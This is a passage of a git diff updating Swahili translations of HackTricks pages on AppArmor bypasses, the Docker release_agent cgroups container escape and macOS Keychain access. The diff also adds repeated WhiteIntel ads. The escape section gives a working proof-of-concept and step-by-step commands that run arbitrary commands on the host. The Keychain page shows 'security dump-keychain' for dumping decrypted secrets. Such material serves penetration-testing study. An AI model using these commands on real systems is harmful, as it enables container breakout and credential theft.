"AppArmorProfile": "lowpriv", "apparmor=lowpriv" ``` -Kisha, unaweza kukimbia mstari ufuatao ili **kupata maelezo sahihi ya profile inayotumiwa**: +Kisha, unaweza kukimbia mstari ufuatao **kupata wasifu sahihi unao tumika**: ```bash find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null ``` -Katika kesi ya ajabu unaweza **kubadilisha maelezo ya apparmor ya docker na kuirudisha tena.** Unaweza kuondoa vizuizi na "kuvuka" vizuizi hivyo. +### Kizuizi cha AppArmor Docker Bypass2 -### Kuvuka AppArmor ya Docker 2 +**AppArmor inategemea njia**, hii inamaanisha kwamba hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi kontena itakavyotekelezwa**, unaweza **kumount** saraka ya proc ya mwenyeji ndani ya **`/host/proc`** na **hakitakuwa chini ya ulinzi wa AppArmor tena**. -**AppArmor inategemea njia**, hii inamaanisha kwamba hata kama inaweza **kulinda** faili ndani ya saraka kama **`/proc`** ikiwa unaweza **kuweka jinsi chombo cha kudhibitiwa kitakavyotekelezwa**, unaweza **kufunga** saraka ya proc ya mwenyeji ndani ya **`/host/proc`** na haitalindwa tena na AppArmor. +### Kizuizi cha Shebang cha AppArmor -### Kuvuka Shebang ya AppArmor - -Katika [**mdudu huu**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unatengeneza script ya shell **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **kutekeleza faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. Kwa mfano: +Katika [**kosa hili**](https://bugs.launchpad.net/apparmor/+bug/1911431) unaweza kuona mfano wa jinsi **hata kama unazuia perl kutumika na rasilimali fulani**, ikiwa tu unajenga script ya shell **ukiainisha** kwenye mstari wa kwanza **`#!/usr/bin/perl`** na **kutekeleza faili moja kwa moja**, utaweza kutekeleza chochote unachotaka. K.m.: ```perl echo '#!/usr/bin/perl use POSIX qw(strftime); @@ -266,16 +278,28 @@ exec "/bin/sh"' > /tmp/test.pl chmod +x /tmp/test.pl /tmp/test.pl ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 22efa7bab..a5ae175b2 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -1,23 +1,36 @@ -# Kutoroka kwa Docker release_agent cgroups +# Kutoroka kwa cgroups ya Docker kupitia release\_agent
-Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze kuhusu kuhack AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel -**Kwa maelezo zaidi, tazama [chapisho la blogi asili](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hii ni muhtasari tu: +
-PoC Asili: +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +**Kwa maelezo zaidi, tazama [chapisho la blogi la asili](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hii ni muhtasari tu: + +Poc ya Asili: ```shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release @@ -25,50 +38,62 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o ``` -Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kujenga faili ya `release_agent` na kusababisha wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika: +Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kuunda faili ya `release_agent` na kuzindua wito wake kutekeleza amri za aina yoyote kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zinazohusika: 1. **Andaa Mazingira:** -- Inajengwa saraka `/tmp/cgrp` kama sehemu ya kufunga cgroup. -- Kudhibitiwa kwa cgroup ya RDMA kwenye saraka hii. Ikiwa kudhibitiwa kwa RDMA hakupo, inashauriwa kutumia kudhibitiwa kwa cgroup ya `memory` kama mbadala. + - Dhibiti `/tmp/cgrp` inaundwa kutumika kama kituo cha mlima kwa cgroup. + - Msimamizi wa cgroup wa RDMA unamiminiwa kwenye saraka hii. Kwa kutokuwepo kwa msimamizi wa RDMA, inapendekezwa kutumia msimamizi wa cgroup wa `memory` kama mbadala. ```shell mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ``` -2. **Sanidi Kikundi cha Mtoto:** -- Kikundi cha mtoto kinachoitwa "x" kinatengenezwa ndani ya saraka iliyosanidiwa ya kikundi. -- Arifa zinaidhinishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release. +2. **Wekeza Kikundi cha Mtoto (Child Cgroup):** + - Kikundi cha mtoto kinachoitwa "x" kinaundwa ndani ya saraka iliyomountiwa ya cgroup. + - Taarifa zinaanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release. ```shell echo 1 > /tmp/cgrp/x/notify_on_release ``` -3. **Sanidi Wakala wa Kutolewa:** +3. **Sanidi Msimamizi wa Kutolewa:** - Njia ya chombo kwenye mwenyeji inapatikana kutoka faili ya /etc/mtab. -- Faili ya release_agent ya cgroup inasanidiwa kutekeleza hati iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana. +- Faili ya release_agent ya cgroup kisha inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana. ```shell host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent ``` 4. **Unda na Sanidi Skripti ya /cmd:** -- Skripti ya /cmd inaundwa ndani ya kontena na inasanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output ndani ya kontena. Njia kamili ya /output kwenye mwenyeji inatajwa. +- Skripti ya /cmd inaundwa ndani ya chombo na kusanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output kwenye chombo. Njia kamili ya /output kwenye mwenyeji inatajwa. ```shell echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd ``` -5. **Kuzindua Shambulio:** -- Mchakato unaanzishwa ndani ya kikundi cha watoto "x" na mara moja unakomeshwa. -- Hii inazindua `release_agent` (script ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwenye /output ndani ya kontena. +5. **Kuzindua Shambulizi:** +- Mchakato unaanzishwa ndani ya cgroup ya mtoto "x" na mara moja unakomeshwa. +- Hii inazindua `release_agent` (skripti ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena. ```shell sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md index eaf01aded..0179bd2d2 100644 --- a/macos-hardening/macos-red-teaming/macos-keychain.md +++ b/macos-hardening/macos-red-teaming/macos-keychain.md @@ -1,71 +1,85 @@ -# macOS Keychain +# Keychain ya macOS
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-## Keychain Kuu +## WhiteIntel -* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **vitambulisho maalum vya mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyotengenezwa na mtumiaji, nywila za mtandao, na funguo za umma / binafsi zilizotengenezwa na mtumiaji. -* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo inahifadhi **vitambulisho vya mfumo kwa kiwango cha mfumo** kama vile nywila za WiFi, vyeti vya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo. +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochomwa na **dark-web** inayotoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +## Keychains Kuu + +* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **siri maalum za mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/binafsi zilizoundwa na mtumiaji. +* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo nzima** kama nywila za WiFi, vyeti vya mizizi ya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo. ### Upatikanaji wa Nywila za Keychain -Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila halisi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua. +Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila ya wazi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua. -## Ulinzi wa Vitambulisho vya Keychain +## Kinga ya Kuingia kwa Keychain ### ACLs -Kila kuingia kwenye keychain linatawaliwa na **Majedwali ya Kudhibiti Upatikanaji (ACLs)** ambayo yanadhibiti ni nani anaweza kufanya vitendo mbalimbali kwenye kuingia kwenye keychain, ikiwa ni pamoja na: +Kila kuingia kwenye keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingia kwenye keychain, ikiwa ni pamoja na: * **ACLAuhtorizationExportClear**: Inaruhusu mmiliki kupata maandishi wazi ya siri. * **ACLAuhtorizationExportWrapped**: Inaruhusu mmiliki kupata maandishi wazi yaliyofichwa na nywila nyingine iliyotolewa. -* **ACLAuhtorizationAny**: Inaruhusu mmiliki kufanya kitendo chochote. +* **ACLAuhtorizationAny**: Inaruhusu mmiliki kutekeleza kitendo chochote. -ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kufanya vitendo hivi bila kuuliza. Hii inaweza kuwa: +ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kutekeleza vitendo hivi bila kuulizwa. Hii inaweza kuwa: -* **N`il`** (hakuna idhini inayohitajika, **kila mtu anaaminika**) +* **Hakuna** (hakuna idhini inayohitajika, **kila mtu anaaminika**) * Orodha **tupu** (**hakuna mtu** anaaminika) * **Orodha** ya **programu maalum**. -Pia kuingia kunaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.** +Pia kuingia inaweza kuwa na ufunguo **`ACLAuthorizationPartitionID`,** ambao hutumiwa kutambua **teamid, apple,** na **cdhash.** -* Ikiwa **teamid** imeelekezwa, basi ili **kupata thamani ya kuingia** bila **kuuliza**, programu iliyotumika lazima iwe na **teamid sawa**. -* Ikiwa **apple** imeelekezwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**. -* Ikiwa **cdhash** inaonyeshwa, basi programu lazima iwe na **cdhash** maalum. +* Ikiwa **teamid** imetajwa, basi ili **kupata thamani ya kuingia bila** **kuuliza**, programu iliyotumiwa lazima iwe na **teamid sawa**. +* Ikiwa **apple** imetajwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**. +* Ikiwa **cdhash** imetajwa, basi programu lazima iwe na **cdhash** maalum. -### Kuunda Kuingia kwenye Keychain +### Kuunda Kuingia kwa Keychain -Wakati kuingia kwenye keychain mpya inaundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika: +Wakati kuingia **mgeni** **mgeni** anatumia **`Keychain Access.app`**, sheria zifuatazo zinatumika: -* Programu zote zinaweza kusimbua. -* **Hakuna programu** inaweza kusafirisha/kusimbua (bila kuuliza mtumiaji). +* Programu zote zinaweza kufanya usimbaji. +* **Hakuna programu** inaweza kuuza/kufuli (bila kuuliza mtumiaji). * Programu zote zinaweza kuona ukaguzi wa uadilifu. * Hakuna programu inaweza kubadilisha ACLs. -* **partitionID** imewekwa kuwa **`apple`**. +* **PartitionID** imewekwa kama **`apple`**. -Wakati programu inaunda kuingia kwenye keychain, sheria ni kidogo tofauti: +Wakati **programu inaunda kuingia kwenye keychain**, sheria ni tofauti kidogo: -* Programu zote zinaweza kusimbua. -* Ni programu ya **kuunda kuingia** (au programu nyingine yoyote iliyowekwa wazi) tu inaweza kusafirisha/kusimbua (bila kuuliza mtumiaji). +* Programu zote zinaweza kufanya usimbaji. +* Ni **programu inayounda** (au programu nyingine yoyote iliyowekwa wazi) inaweza kuuza/kufuli (bila kuuliza mtumiaji). * Programu zote zinaweza kuona ukaguzi wa uadilifu. * Hakuna programu inaweza kubadilisha ACLs. -* **partitionID** imewekwa kuwa **`teamid:[teamID hapa]`**. +* **PartitionID** imewekwa kama **`teamid:[teamID hapa]`**. ## Kupata Keychain -### `security` +### `usalama` ```bash # Dump all metadata and decrypted secrets (a lot of pop-ups) security dump-keychain -a -d @@ -79,69 +93,81 @@ security set-generic-password-parition-list -s "test service" -a "test acount" - ### APIs {% hint style="success" %} -**Uchunguzi na kudondosha** kwa siri za **keychain** ambazo **hazitazalisha ombi** inaweza kufanywa kwa kutumia zana [**LockSmith**](https://github.com/its-a-feature/LockSmith) +**Uchambuzi na kudumpisha** kwa siri ambazo **hazitatoa ujumbe** unaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith) {% endhint %} -Pata orodha na **habari** kuhusu kila kuingia kwenye keychain: +Pata na **taarifa** kuhusu kila kuingia kwenye keychain: -* API ya **`SecItemCopyMatching`** inatoa habari kuhusu kila kuingia na kuna sifa kadhaa unazoweza kuweka unapotumia: -* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kuwa sahihi ili kuepuka pop-ups) -* **`kSecReturnRef`**: Pata pia kumbukumbu ya kipengee cha keychain (weka kuwa kweli ikiwa baadaye unaona unaweza kufichua bila pop-up) -* **`kSecReturnAttributes`**: Pata metadata kuhusu kuingia +* API ya **`SecItemCopyMatching`** hutoa taarifa kuhusu kila kuingia na kuna sifa unazoweza kuweka unapotumia: +* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uwongo kuepuka pop-ups) +* **`kSecReturnRef`**: Pata pia kumbukumbu ya kuingia kwenye keychain (weka kama kweli kwa kesi utaona unaweza kufichua bila pop-up) +* **`kSecReturnAttributes`**: Pata maelezo kuhusu kuingia * **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudi * **`kSecClass`**: Aina gani ya kuingia kwenye keychain Pata **ACLs** ya kila kuingia: -* Kwa kutumia API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudi orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa hapo awali) ambapo kila orodha ina: +* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kuingia kwenye keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa awali) ambapo kila orodha ina: * Maelezo -* **Orodha ya Maombi Yaliyoidhinishwa**. Hii inaweza kuwa: +* **Orodha ya Maombi Yaliyoaminika**. Hii inaweza kuwa: * Programu: /Applications/Slack.app * Binary: /usr/libexec/airportd * Kikundi: group://AirPort -Changanua data: +Ficha data: * API ya **`SecKeychainItemCopyContent`** inapata maandishi wazi -* API ya **`SecItemExport`** inachanganua funguo na vyeti lakini inaweza kuwa inahitaji kuweka nywila ili kuchanganua yaliyomo yaliyofichwa +* API ya **`SecItemExport`** inaexport funguo na vyeti lakini inaweza kuhitaji kuweka nywila kuuza yaliyomo yaliyofichwa -Na hizi ndizo **mahitaji** ya kuweza **kuchanganua siri bila ombi**: +Na hizi ni **mahitaji** ya kuweza **kuexport siri bila ujumbe**: -* Ikiwa kuna **programu 1 au zaidi zilizoidhinishwa**: -* Inahitaji **idhini sahihi** (**`Nil`**, au kuwa sehemu ya orodha iliyoruhusiwa ya programu katika idhini ya kufikia habari za siri) -* Inahitaji saini ya nambari kufanana na **PartitionID** -* Inahitaji saini ya nambari kufanana na ile ya **programu iliyoidhinishwa** (au kuwa mwanachama wa Kikundi sahihi cha KeychainAccessGroup) -* Ikiwa **programu zote zinatambuliwa**: -* Inahitaji **idhini sahihi** -* Inahitaji saini ya nambari kufanana na **PartitionID** -* Ikiwa hakuna **PartitionID**, basi hii haihitajiki +* Ikiwa kuna **programu 1 au zaidi** zilizoorodheshwa: +* Unahitaji **idhini sahihi** (**`Nil`**, au kuwa **sehemu** ya orodha iliyoruhusiwa ya programu katika idhini ya kupata taarifa za siri) +* Unahitaji sahihi ya msimbo kulingana na **PartitionID** +* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa KeychainAccessGroup sahihi) +* Ikiwa **programu zote zinaaminika**: +* Unahitaji **idhini sahihi** +* Unahitaji sahihi ya msimbo kulingana na **PartitionID** +* Ikiwa **hakuna PartitionID**, basi hii haifai {% hint style="danger" %} -Kwa hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza nambari kwenye programu hiyo**. +Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo kwenye programu hiyo**. -Ikiwa **apple** imeonyeshwa katika **PartitionID**, unaweza kufikia hiyo na **`osascript`** kwa hivyo chochote kinachotumaini programu zote na apple katika PartitionID. **`Python`** pia inaweza kutumika kwa hili. +Ikiwa **apple** imeonyeshwa katika **partitionID**, unaweza kupata kwa kutumia **`osascript`** kwa hivyo chochote kinachotumaini programu zote na apple katika partitionID. **`Python`** pia inaweza kutumika kwa hili. {% endhint %} -### Atributi mbili zaidi +### Sifa mbili za ziada -* **Invisible**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwenye programu ya **UI** ya Keychain -* **General**: Ni kuhifadhi **metadata** (kwa hivyo HAIJAFICHWA) -* Microsoft ilikuwa inahifadhi kwa maandishi wazi vivuli vyote vya kuboresha kufikia mwisho nyeti. +* **Isiyoweza kuonekana**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwa programu ya **UI** ya Keychain +* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIYOFICHWA) +* Microsoft ilikuwa inahifadhi katika maandishi wazi vitambulisho vyote vya upya kufikia mwisho wa nyeti. ## Marejeo * [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
